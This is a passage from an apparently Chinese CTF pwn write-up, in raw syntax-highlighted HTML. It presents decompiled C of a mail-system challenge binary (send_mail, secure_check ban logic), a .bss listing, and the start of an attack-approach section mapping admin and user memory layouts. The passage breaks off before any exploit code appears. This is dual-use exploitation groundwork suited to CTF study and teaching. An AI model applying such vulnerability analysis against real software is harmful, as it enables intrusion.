class="o">+</span> <span class="mh">0x308</span><span class="p">)</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;Inbox (new mail):&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">((</span><span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="n">a1</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)(</span><span class="n">a1</span> <span class="o">+</span> <span class="mh">0x308</span><span class="p">)</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nf">putchar</span><span class="p">(</span><span class="mi">10</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;No new mail in inbox.</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"><span class="nl">LABEL_17</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;Invalid choice!</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="nf">putchar</span><span class="p">(</span><span class="mi">10</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">v3</span> <span class="o">-</span> <span class="nf">__readfsqword</span><span class="p">(</span><span class="mh">0x28u</span><span class="p">);</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></td></tr></table> </div> </div><p>读邮件</p> <h4 id="send_mail">send_mail </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span><span class="lnt">60 </span><span class="lnt">61 </span><span class="lnt">62 </span><span class="lnt">63 </span><span class="lnt">64 </span><span class="lnt">65 </span><span class="lnt">66 </span><span class="lnt">67 </span><span class="lnt">68 </span><span class="lnt">69 </span><span class="lnt">70 </span><span class="lnt">71 </span><span class="lnt">72 </span><span class="lnt">73 </span><span class="lnt">74 </span><span class="lnt">75 </span><span class="lnt">76 </span><span class="lnt">77 </span><span class="lnt">78 </span><span class="lnt">79 </span><span class="lnt">80 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="kr">__int64</span> <span class="kr">__fastcall</span> <span class="nf">send_mail</span><span class="p">(</span><span class="kt">size_t</span> <span class="o">*</span><span class="n">a1</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="kt">char</span> <span class="n">v2</span><span class="p">;</span> <span class="c1">// [rsp+1Bh] [rbp-25h] BYREF </span></span></span><span class="line"><span class="cl"> <span class="kt">int</span> <span class="n">v3</span><span class="p">;</span> <span class="c1">// [rsp+1Ch] [rbp-24h] BYREF </span></span></span><span class="line"><span class="cl"> <span class="kt">size_t</span> <span class="n">n</span><span class="p">;</span> <span class="c1">// [rsp+20h] [rbp-20h] </span></span></span><span class="line"><span class="cl"> <span class="kt">size_t</span> <span class="n">v5</span><span class="p">;</span> <span class="c1">// [rsp+28h] [rbp-18h] </span></span></span><span class="line"><span class="cl"> <span class="n">_QWORD</span> <span class="o">*</span><span class="n">v6</span><span class="p">;</span> <span class="c1">// [rsp+30h] [rbp-10h] </span></span></span><span class="line"><span class="cl"> <span class="kt">unsigned</span> <span class="kr">__int64</span> <span class="n">v7</span><span class="p">;</span> <span class="c1">// [rsp+38h] [rbp-8h] </span></span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">v7</span> <span class="o">=</span> <span class="nf">__readfsqword</span><span class="p">(</span><span class="mh">0x28u</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;Who do you want to send the mail to? (input user ID 1-12)&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="p">(</span><span class="kt">unsigned</span> <span class="kt">int</span><span class="p">)</span><span class="nf">__isoc99_scanf</span><span class="p">(</span><span class="s">&#34;%d&#34;</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">v3</span><span class="p">)</span> <span class="o">==</span> <span class="mi">1</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">v3</span> <span class="o">&gt;</span> <span class="mi">0</span> <span class="o">&amp;&amp;</span> <span class="n">v3</span> <span class="o">&lt;=</span> <span class="mi">12</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">user_table</span><span class="p">[</span><span class="n">v3</span> <span class="o">-</span> <span class="mi">1</span><span class="p">]</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">a1</span><span class="p">[</span><span class="mh">0x62</span><span class="p">]</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">v5</span> <span class="o">=</span> <span class="n">a1</span><span class="p">[</span><span class="mh">0x4F</span><span class="p">];</span> </span></span><span class="line"><span class="cl"> <span class="n">v6</span> <span class="o">=</span> <span class="o">&amp;</span><span class="n">this_is_time</span><span class="p">[</span><span class="mi">34</span> <span class="o">*</span> <span class="n">v5</span> <span class="o">-</span> <span class="mi">34</span><span class="p">];</span> </span></span><span class="line"><span class="cl"> <span class="o">++*</span><span class="p">((</span><span class="n">_DWORD</span> <span class="o">*</span><span class="p">)</span><span class="n">v6</span> <span class="o">+</span> <span class="mi">2</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="p">(</span><span class="kt">unsigned</span> <span class="kt">int</span><span class="p">)</span><span class="nf">secure_check</span><span class="p">(</span><span class="n">v5</span><span class="p">)</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="mi">1</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> <span class="k">if</span> <span class="p">(</span> <span class="o">!*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)(</span><span class="n">user_table</span><span class="p">[</span><span class="n">v3</span> <span class="o">-</span> <span class="mi">1</span><span class="p">]</span> <span class="o">+</span> <span class="mh">0x308LL</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="o">||</span> <span class="p">(</span><span class="nf">printf</span><span class="p">(</span><span class="s">&#34;Warning: User %d already has unread mail. Overwrite? (y/n): &#34;</span><span class="p">,</span> <span class="n">v3</span><span class="p">),</span> </span></span><span class="line"><span class="cl"> <span class="nf">__isoc99_scanf</span><span class="p">(</span><span class="s">&#34; %c&#34;</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">v2</span><span class="p">),</span> </span></span><span class="line"><span class="cl"> <span class="n">v2</span> <span class="o">==</span> <span class="mi">121</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="o">||</span> <span class="n">v2</span> <span class="o">==</span> <span class="mi">89</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">n</span> <span class="o">=</span> <span class="n">a1</span><span class="p">[</span><span class="mi">32</span><span class="p">];</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">n</span> <span class="o">&gt;</span> <span class="mh">0x100</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">n</span> <span class="o">=</span> <span class="mi">256</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)(</span><span class="n">user_table</span><span class="p">[</span><span class="n">v3</span> <span class="o">-</span> <span class="mi">1</span><span class="p">]</span> <span class="o">+</span> <span class="mh">0x308LL</span><span class="p">)</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nf">memcpy</span><span class="p">((</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="n">user_table</span><span class="p">[</span><span class="n">v3</span> <span class="o">-</span> <span class="mi">1</span><span class="p">],</span> <span class="n">a1</span> <span class="o">+</span> <span class="mi">34</span><span class="p">,</span> <span class="n">n</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)(</span><span class="n">user_table</span><span class="p">[</span><span class="n">v3</span> <span class="o">-</span> <span class="mi">1</span><span class="p">]</span> <span class="o">+</span> <span class="mh">0x210LL</span><span class="p">)</span> <span class="o">=</span> <span class="n">n</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">a1</span><span class="p">[</span><span class="mi">98</span><span class="p">]</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;Mail sent to user %d!</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="n">v3</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">putchar</span><span class="p">(</span><span class="mi">10</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;Mail sending cancelled.&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">putchar</span><span class="p">(</span><span class="mi">10</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;No draft to send! Please write a mail first.&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">putchar</span><span class="p">(</span><span class="mi">10</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;User does not exist!&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">putchar</span><span class="p">(</span><span class="mi">10</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;Invalid user ID! Must be between 1 and 12.&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">putchar</span><span class="p">(</span><span class="mi">10</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;Invalid input!&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">while</span> <span class="p">(</span> <span class="nf">getchar</span><span class="p">()</span> <span class="o">!=</span> <span class="mi">10</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nf">putchar</span><span class="p">(</span><span class="mi">10</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></td></tr></table> </div> </div><p>发送邮件</p> <h4 id="read_menu">read_menu </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="kt">int</span> <span class="nf">read_menu</span><span class="p">()</span> </span></span><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;What would you like to read?&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;1. My saved draft&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;2. Inbox (mails sent to me)&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;3. Back to main menu&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;Your choice: &#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></td></tr></table> </div> </div><p>读邮件面板</p> <h4 id="secure_check">secure_check </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="kr">__int64</span> <span class="kr">__fastcall</span> <span class="nf">secure_check</span><span class="p">(</span><span class="kt">int</span> <span class="n">a1</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="kt">time_t</span> <span class="n">v2</span><span class="p">;</span> <span class="c1">// [rsp+10h] [rbp-20h] </span></span></span><span class="line"><span class="cl"> <span class="kt">time_t</span> <span class="o">*</span><span class="n">v3</span><span class="p">;</span> <span class="c1">// [rsp+18h] [rbp-18h] </span></span></span><span class="line"><span class="cl"> <span class="n">_QWORD</span> <span class="o">*</span><span class="n">v4</span><span class="p">;</span> <span class="c1">// [rsp+20h] [rbp-10h] </span></span></span><span class="line"><span class="cl"> <span class="n">FILE</span> <span class="o">*</span><span class="n">stream</span><span class="p">;</span> <span class="c1">// [rsp+28h] [rbp-8h] </span></span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">v2</span> <span class="o">=</span> <span class="nf">time</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">v3</span> <span class="o">=</span> <span class="o">&amp;</span><span class="n">this_is_time</span><span class="p">[</span><span class="mi">34</span> <span class="o">*</span> <span class="n">a1</span> <span class="o">-</span> <span class="mi">34</span><span class="p">];</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">v2</span> <span class="o">-</span> <span class="o">*</span><span class="n">v3</span> <span class="o">&gt;</span> <span class="mi">10</span> <span class="o">||</span> <span class="o">*</span><span class="p">((</span><span class="kt">int</span> <span class="o">*</span><span class="p">)</span><span class="n">v3</span> <span class="o">+</span> <span class="mi">2</span><span class="p">)</span> <span class="o">&lt;=</span> <span class="mi">4</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">v2</span> <span class="o">-</span> <span class="o">*</span><span class="n">v3</span> <span class="o">&gt;</span> <span class="mi">10</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="o">*</span><span class="p">((</span><span class="n">_DWORD</span> <span class="o">*</span><span class="p">)</span><span class="n">v3</span> <span class="o">+</span> <span class="mi">2</span><span class="p">)</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="o">*</span><span class="n">v3</span> <span class="o">=</span> <span class="n">v2</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;</span><span class="se">\x1B</span><span class="s">[1;31;40m[SECURITY] Risk detected for user %d! Account banned.</span><span class="se">\x1B</span><span class="s">[0m</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="n">a1</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">a1</span> <span class="o">&gt;</span> <span class="mi">0</span> <span class="o">&amp;&amp;</span> <span class="n">a1</span> <span class="o">&lt;=</span> <span class="mi">12</span> <span class="o">&amp;&amp;</span> <span class="n">user_table</span><span class="p">[</span><span class="n">a1</span> <span class="o">-</span> <span class="mi">1</span><span class="p">]</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">v4</span> <span class="o">=</span> <span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)</span><span class="n">user_table</span><span class="p">[</span><span class="n">a1</span> <span class="o">-</span> <span class="mi">1</span><span class="p">];</span> </span></span><span class="line"><span class="cl"> <span class="n">v4</span><span class="p">[</span><span class="mh">0x53</span><span class="p">]</span> <span class="o">=</span> <span class="err">&#39;</span><span class="n">lagelli</span><span class="err">&#39;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">stream</span> <span class="o">=</span> <span class="nf">fopen</span><span class="p">(</span><span class="s">&#34;/dev/urandom&#34;</span><span class="p">,</span> <span class="s">&#34;rb&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">stream</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">fread</span><span class="p">(</span><span class="n">v4</span> <span class="o">+</span> <span class="mi">88</span><span class="p">,</span> <span class="mi">1u</span><span class="p">,</span> <span class="mh">0x10u</span><span class="p">,</span> <span class="n">stream</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">fclose</span><span class="p">(</span><span class="n">stream</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="n">v4</span><span class="p">[</span><span class="mh">0x4F</span><span class="p">]</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;Account has been banned!&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;Returning to login menu...</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="mi">1</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></td></tr></table> </div> </div><p>安全检测,发送频率过高会封号</p> <h3 id="bss">bss </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">.bss:0000000000007020 ; =========================================================================== </span></span><span class="line"><span class="cl">.bss:0000000000007020 </span></span><span class="line"><span class="cl">.bss:0000000000007020 ; Segment type: Uninitialized </span></span><span class="line"><span class="cl">.bss:0000000000007020 ; Segment permissions: Read/Write </span></span><span class="line"><span class="cl">.bss:0000000000007020 _bss segment align_32 public &#39;BSS&#39; use64 </span></span><span class="line"><span class="cl">.bss:0000000000007020 assume cs:_bss </span></span><span class="line"><span class="cl">.bss:0000000000007020 ;org 7020h </span></span><span class="line"><span class="cl">.bss:0000000000007020 assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing </span></span><span class="line"><span class="cl">.bss:0000000000007020 public stdout </span></span><span class="line"><span class="cl">.bss:0000000000007020 ; FILE *stdout </span></span><span class="line"><span class="cl">.bss:0000000000007020 stdout dq ? ; DATA XREF: LOAD:00000000000006A0↑o </span></span><span class="line"><span class="cl">.bss:0000000000007020 ; init+2A↑r </span></span><span class="line"><span class="cl">.bss:0000000000007020 ; Copy of shared data </span></span><span class="line"><span class="cl">.bss:0000000000007028 align 10h </span></span><span class="line"><span class="cl">.bss:0000000000007030 public stdin </span></span><span class="line"><span class="cl">.bss:0000000000007030 ; FILE *stdin </span></span><span class="line"><span class="cl">.bss:0000000000007030 stdin dq ? ; DATA XREF: LOAD:00000000000006D0↑o </span></span><span class="line"><span class="cl">.bss:0000000000007030 ; init+C↑r </span></span><span class="line"><span class="cl">.bss:0000000000007030 ; Copy of shared data </span></span><span class="line"><span class="cl">.bss:0000000000007038 align 20h </span></span><span class="line"><span class="cl">.bss:0000000000007040 public stderr </span></span><span class="line"><span class="cl">.bss:0000000000007040 ; FILE *stderr </span></span><span class="line"><span class="cl">.bss:0000000000007040 stderr dq ? ; DATA XREF: LOAD:0000000000000700↑o </span></span><span class="line"><span class="cl">.bss:0000000000007040 ; init+48↑r </span></span><span class="line"><span class="cl">.bss:0000000000007040 ; Copy of shared data </span></span><span class="line"><span class="cl">.bss:0000000000007048 byte_7048 db ? ; DATA XREF: sub_13E0+4↑r </span></span><span class="line"><span class="cl">.bss:0000000000007048 ; sub_13E0+2C↑w </span></span><span class="line"><span class="cl">.bss:0000000000007049 align 20h </span></span><span class="line"><span class="cl">.bss:0000000000007060 ; _QWORD user_table[12] </span></span><span class="line"><span class="cl">.bss:0000000000007060 user_table dq 0Ch dup(?) ; DATA XREF: secure_check+A7↑o </span></span><span class="line"><span class="cl">.bss:0000000000007060 ; secure_check+CB↑o ... </span></span><span class="line"><span class="cl">.bss:00000000000070C0 ; void *this_is_admin </span></span><span class="line"><span class="cl">.bss:00000000000070C0 this_is_admin dq ? ; DATA XREF: init+BC↑w </span></span><span class="line"><span class="cl">.bss:00000000000070C0 ; init+C3↑r ... </span></span><span class="line"><span class="cl">.bss:00000000000070C8 align 20h </span></span><span class="line"><span class="cl">.bss:00000000000070E0 ; _QWORD this_is_time[408] </span></span><span class="line"><span class="cl">.bss:00000000000070E0 this_is_time dq 198h dup(?) ; DATA XREF: secure_check+34↑o </span></span><span class="line"><span class="cl">.bss:00000000000070E0 ; init+9D↑o ... </span></span><span class="line"><span class="cl">.bss:00000000000070E0 _bss ends </span></span><span class="line"><span class="cl">.bss:00000000000070E0 </span></span></code></pre></td></tr></table> </div> </div><p>bss 结构</p> <h3 id="攻击思路">攻击思路 </h3><p>难点是梳理程序流程和内存的结构以及识别漏洞点</p> <h4 id="管理员内存结构">管理员内存结构 </h4><p>管理员内存大小为 0x400</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">0x32: 名称 </span></span><span class="line"><span class="cl">0x68: 密码 </span></span></code></pre></td></tr></table> </div> </div><h4 id="用户内存结构">用户内存结构 </h4><p>用户内存大小为 0x410</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">0x0-0x100: 0x100 收件 </span></span><span class="line"><span class="cl">0x100-0x108: 0x8 草稿大小 </span></span><span class="line"><span class="cl">0x110-0x210: 0x100 草稿 </span></span><span class="line"><span class="cl">0x210-0x218: 0x8 收件大小 </span></span><span class="line"><span class="cl">0x278-0x280: 0x8 编号,被 ban 清零 </span></span><span class="line"><span class="cl">0x298-0x2B8: 0x20 用户名 </span></span><span class="line"><span 